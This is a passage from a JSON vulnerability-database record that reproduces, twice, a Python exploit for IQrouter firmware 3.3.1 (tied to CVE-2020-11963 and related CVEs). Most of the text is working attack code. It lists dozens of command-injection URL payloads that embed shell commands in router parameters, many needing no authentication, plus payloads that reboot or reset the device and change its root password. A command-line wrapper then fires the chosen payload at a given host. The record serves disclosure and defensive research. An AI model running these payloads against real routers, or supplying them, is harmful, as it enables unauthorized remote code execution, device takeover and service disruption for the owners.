\"/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/\",\r\n \"RCE /diag_wifi (htm2ghz param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/\",\r\n \"RCE /diag_wifi (c5ghz param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/\",\r\n \"RCE /diag_wifi (c2ghz param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/\",\r\n \"RCE /diag_set_static_wan (static_ip param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/\",\r\n \"RCE /diag_set_static_wan (net_mask param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/\",\r\n \"RCE /diag_set_static_wan (gateway param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/\",\r\n \"RCE /diag_set_static_wan (dns param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/\",\r\n \"RCE /diag_set_static_modem (static_ip param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/\",\r\n \"RCE /diag_set_static_modem (net_mask param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/\",\r\n \"RCE /diag_set_static_modem (gateway param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/\",\r\n \"RCE /diag_set_device_name_and_sync (device_name param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_device_name/'`{}`'/\",\r\n \"RCE /diag_set_device_name (device_name param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/\",\r\n \"RCE /diag_pppoe_update (wan_username param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/\",\r\n \"RCE /diag_pppoe_update (wan_password param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/\",\r\n \"RCE /diag_pppoe (wan_username param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/\",\r\n \"RCE /diag_pppoe (wan_password param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/\",\r\n \"RCE /diag_pppoa_update (wan_username param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/\",\r\n \"RCE /diag_pppoa_update (wan_password param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/\",\r\n \"RCE /diag_pppoa (wan_username param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/\",\r\n \"RCE /diag_pppoa (wan_password param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/advanced_link?link='`{}`'\",\r\n \"RCE /advanced_link (link param)\"\r\n ]\r\n\r\n]\r\n\r\nadvanced_payloads = [\r\n [\r\n \"/cgi-bin/luci/er/reboot_link?reboot=1\",\r\n \"Reboot IQrouter (/reboot_link reboot param))\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen2?reboot=1\",\r\n \"Reboot IQrouter (/screen2 reboot param))\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/index?reset_config=1\",\r\n \"Reset IQrouter (/index reset_config param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen7?upgrade=1\",\r\n \"Upgrade IQrouter (/screen7 upgrade param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/vlanTag?restart_network=1\",\r\n \"Restart network (/vlanTag restart_network param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_iperf_cmd/start\",\r\n \"Start iperf script (/diag_iperf_cmd/start)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_iperf_cmd/stop\",\r\n \"Stop iperf script (/diag_iperf_cmd/stop)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/get_syslog\",\r\n \"Router setup info log (/get_syslog)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_password/c00lpasswd/\",\r\n \"Change root password to c00lpasswd (can change in code)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/reset_password/\",\r\n \"Change root password to 'changeme' (static)\"\r\n ]\r\n]\r\n\r\n\r\ndef print_payloads():\r\n print('#' * 30)\r\n print(\"Payloads list\")\r\n num = 1\r\n print('######################### RCE without auth ########################')\r\n for payload in rce_any:\r\n print(\"{} - {}\".format(num, payload[1]))\r\n num += 1\r\n\r\n print(\r\n '############### RCE (router need to be in setup mode) ###############')\r\n for payload in rce_setup:\r\n print(\"{} - {}\".format(num, payload[1]))\r\n num += 1\r\n\r\n print(\r\n '######################### Advanced payloads #########################')\r\n for payload in advanced_payloads:\r\n print(\"{} - {}\".format(num, payload[1]))\r\n num += 1\r\n\r\n\r\nparser = argparse.ArgumentParser(description=\"IQrouter multiple RCE\")\r\nparser.add_argument('--host', help='Host', type=str)\r\nparser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int)\r\nparser.add_argument('-n', '--num', help='Payload number',\r\n default=0, type=int)\r\nparser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)',\r\n default=\"pwd\", type=str)\r\nparser.add_argument('--protocol', help='Protocol (http/https)',\r\n default=\"http\", type=str)\r\n\r\nargs = parser.parse_args()\r\n\r\n\r\ndef main():\r\n print(\"\")\r\n full_payload_list = rce_setup + rce_any + advanced_payloads\r\n payloads_amount = len(full_payload_list)\r\n try:\r\n hostname = args.host\r\n port = args.port\r\n payload_num = int(args.num)\r\n bash_cmd = args.cmd\r\n protocol = args.protocol\r\n\r\n if payload_num < 1 or payload_num > payloads_amount:\r\n print(\"Error with payload number!\")\r\n raise IndexError\r\n if port < 0 or port > 65535:\r\n print(\"Error with port number\")\r\n raise IndexError\r\n if protocol not in ['http', 'https']:\r\n print(\"Error with protocol name\")\r\n raise IndexError\r\n\r\n current_payload = full_payload_list[payload_num - 1]\r\n print(\"Payload: {}\".format(current_payload[1]))\r\n print(\"Host: {}\".format(hostname))\r\n print(\"Port: {}\".format(port))\r\n print(\"Protocol: {}\".format(protocol))\r\n print(\"Command: {}\".format(bash_cmd))\r\n\r\n full_url = \"{}://{}:{}{}\".format(protocol, hostname, port,\r\n current_payload[0].format(bash_cmd))\r\n print(\"Built URL: {}\".format(full_url))\r\n\r\n r = requests.get(full_url)\r\n print(\"Status code: {}\".format(r.status_code))\r\n return\r\n except IndexError:\r\n parser.print_help()\r\n print_payloads()\r\n exit(1)\r\n\r\n\r\nif __name__ == '__main__':\r\n print(\r\n \"\\n\\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.\")\r\n exit(main())", "sourceHref": "https://www.exploit-db.com/download/48358", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:C"}}], "packetstorm": [{"lastseen": "2020-04-25T08:10:07", "description": "", "cvss3": {}, "published": "2020-04-21T00:00:00", "type": "packetstorm", "title": "IQrouter 3.3.1 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11968", "CVE-2020-11966", "CVE-2020-11963", "CVE-2020-11964", "CVE-2020-11967"], "modified": "2020-04-21T00:00:00", "id": "PACKETSTORM:157300", "href": "https://packetstormsecurity.com/files/157300/IQrouter-3.3.1-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution \n# Date: 2020-04-21 \n# Exploit Author: drakylar \n# Vendor Homepage: https://evenroute.com/ \n# Software Link: https://evenroute.com/iqrouter \n# Version: IQrouter firmware up to 3.3.1 \n# Tested on: IQrouter firmware 3.3.1 \n# CVE : N/A \n \n#!/usr/bin/env python3 \nimport argparse \nfrom sys import argv, exit \n \ntry: \nimport requests \nexcept ImportError: \nprint(\"Install requests lib! pip3 install requests\") \n \n \nprint(\"\"\" \n####################################################################### \n# IQrouter multiple RCE and other vulnerabilities # \n# by drakylar (Shaposhnikov Ilya) # \n# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 # \n# CVE-2020-11967 CVE-2020-11968 # \n####################################################################### \n\"\"\") \n \n \nrce_setup = [ \n[ \n\"/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'\", \n\"RCE /vlanTag (vlan_tag param)\" \n], \n[ \n\"/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'\", \n\"RCE /verify_wifi (wifi_conflict param). Need hide_wifi_config != true\" \n], \n[ \n\"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2\", \n\"RCE /screen9 (s2 param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2\", \n\"RCE /screen9 (s1 param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'\", \n\"RCE /screen9 (p2 param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2\", \n\"RCE /screen9 (p1 param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen4?save_isp='`{}`\", \n\"RCE /screen4 (save_isp param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'\", \n\"RCE /screen2 set_wan_modem_interfaces param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'\", \n\"RCE /screen2 find_ip_address_conflict param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen10?set_security_question='`{}`'\", \n\"RCE /screen10 (set_security_question param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1\", \n\"RCE /screen10 (set_security_answer param)\"], \n[ \n\"/cgi-bin/luci/er/screen1?zonename='`{}`'\", \n\"RCE /screen1 (zonename param)\" \n], \n[ \n\"/cgi-bin/luci/er/register?email=`{}`\", \n\"RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)\" \n] \n] \n \nrce_any = [ \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1\", \n\"RCE /wifi (s2 param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7\", \n\"RCE /wifi (s1 param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'\", \n\"RCE /wifi (p2 param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4\", \n\"RCE /wifi (p1 param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\", \n\"RCE /wifi (guestwifi_5g_ssid param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\", \n\"RCE /wifi (guestwifi_2g_ssid param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\", \n\"RCE /wifi (guest_key param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7\", \n\"RCE /wifi (enable_guestwifi param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen11.1?email=`{}`®ister=123&uilog=123&bg=123\", \n\"RCE /screen11.1 (email param)\" \n], \n[ \n\"/cgi-bin/luci/er/reboot_link?link='`{}`'\", \n\"RCE /reboot_link (link param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/\", \n\"RCE /diag_wifi (htm5ghz param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/\", \n\"RCE /diag_wifi (htm2ghz param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/\", \n\"RCE /diag_wifi (c5ghz param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/\", \n\"RCE /diag_wifi (c2ghz param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/\", \n\"RCE /diag_set_static_wan (static_ip param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/\", \n\"RCE /diag_set_static_wan (net_mask param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/\", \n\"RCE /diag_set_static_wan (gateway param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/\", \n\"RCE /diag_set_static_wan (dns param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/\", \n\"RCE /diag_set_static_modem (static_ip param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/\", \n\"RCE /diag_set_static_modem (net_mask param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/\", \n\"RCE /diag_set_static_modem (gateway param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/\", \n\"RCE /diag_set_device_name_and_sync (device_name param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_device_name/'`{}`'/\", \n\"RCE /diag_set_device_name (device_name param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/\", \n\"RCE /diag_pppoe_update (wan_username param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/\", \n\"RCE /diag_pppoe_update (wan_password param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/\", \n\"RCE /diag_pppoe (wan_username param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/\", \n\"RCE /diag_pppoe (wan_password param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/\", \n\"RCE /diag_pppoa_update (wan_username param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/\", \n\"RCE /diag_pppoa_update (wan_password param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/\", \n\"RCE /diag_pppoa (wan_username param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/\", \n\"RCE /diag_pppoa (wan_password param)\" \n], \n[ \n\"/cgi-bin/luci/er/advanced_link?link='`{}`'\", \n\"RCE /advanced_link (link param)\" \n] \n \n] \n \nadvanced_payloads = [ \n[ \n\"/cgi-bin/luci/er/reboot_link?reboot=1\", \n\"Reboot IQrouter (/reboot_link reboot param))\" \n], \n[ \n\"/cgi-bin/luci/er/screen2?reboot=1\", \n\"Reboot IQrouter (/screen2 reboot param))\" \n], \n[ \n\"/cgi-bin/luci/er/index?reset_config=1\", \n\"Reset IQrouter (/index reset_config param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen7?upgrade=1\", \n\"Upgrade IQrouter (/screen7 upgrade param)\" \n], \n[ \n\"/cgi-bin/luci/er/vlanTag?restart_network=1\", \n\"Restart network (/vlanTag restart_network param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_iperf_cmd/start\", \n\"Start iperf script (/diag_iperf_cmd/start)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_iperf_cmd/stop\", \n\"Stop iperf script (/diag_iperf_cmd/stop)\" \n], \n[ \n\"/cgi-bin/luci/er/get_syslog\", \n\"Router setup info log (/get_syslog)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_password/c00lpasswd/\", \n\"Change root password to c00lpasswd (can change in code)\" \n], \n[ \n\"/cgi-bin/luci/er/reset_password/\", \n\"Change root password to 'changeme' (static)\" \n] \n] \n \n \ndef print_payloads(): \nprint('#' * 30) \nprint(\"Payloads list\") \nnum = 1 \nprint('######################### RCE without auth ########################') \nfor payload in rce_any: \nprint(\"{} - {}\".format(num, payload[1])) \nnum += 1 \n \nprint( \n'############### RCE (router need to be in setup mode) ###############') \nfor payload in rce_setup: \nprint(\"{} - {}\".format(num, payload[1])) \nnum += 1 \n \nprint( \n'######################### Advanced payloads #########################') \nfor payload in advanced_payloads: \nprint(\"{} - {}\".format(num, payload[1])) \nnum += 1 \n \n \nparser = argparse.ArgumentParser(description=\"IQrouter multiple RCE\") \nparser.add_argument('--host', help='Host', type=str) \nparser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int) \nparser.add_argument('-n', '--num', help='Payload number', \ndefault=0, type=int) \nparser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)', \ndefault=\"pwd\", type=str) \nparser.add_argument('--protocol', help='Protocol (http/https)', \ndefault=\"http\", type=str) \n \nargs = parser.parse_args() \n \n \ndef main(): \nprint(\"\") \nfull_payload_list = rce_setup + rce_any + advanced_payloads \npayloads_amount = len(full_payload_list) \ntry: \nhostname = args.host \nport = args.port \npayload_num = int(args.num) \nbash_cmd = args.cmd \nprotocol = args.protocol \n \nif payload_num < 1 or payload_num > payloads_amount: \nprint(\"Error with payload number!\") \nraise IndexError \nif port < 0 or port > 65535: \nprint(\"Error with port number\") \nraise IndexError \nif protocol not in ['http', 'https']: \nprint(\"Error with protocol name\") \nraise IndexError \n \ncurrent_payload = full_payload_list[payload_num - 1] \nprint(\"Payload: {}\".format(current_payload[1])) \nprint(\"Host: {}\".format(hostname)) \nprint(\"Port: {}\".format(port)) \nprint(\"Protocol: {}\".format(protocol)) \nprint(\"Command: {}\".format(bash_cmd)) \n \nfull_url = \"{}://{}:{}{}\".format(protocol, hostname, port, \ncurrent_payload[0].format(bash_cmd)) \nprint(\"Built URL: {}\".format(full_url)) \n \nr = requests.get(full_url) \nprint(\"Status code: {}\".format(r.status_code)) \nreturn \nexcept IndexError: \nparser.print_help() \nprint_payloads() \nexit(1) \n \n \nif __name__ == '__main__': \nprint( \n\"\\n\\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.\") \nexit(main()) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/157300/iqrouter331-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}]}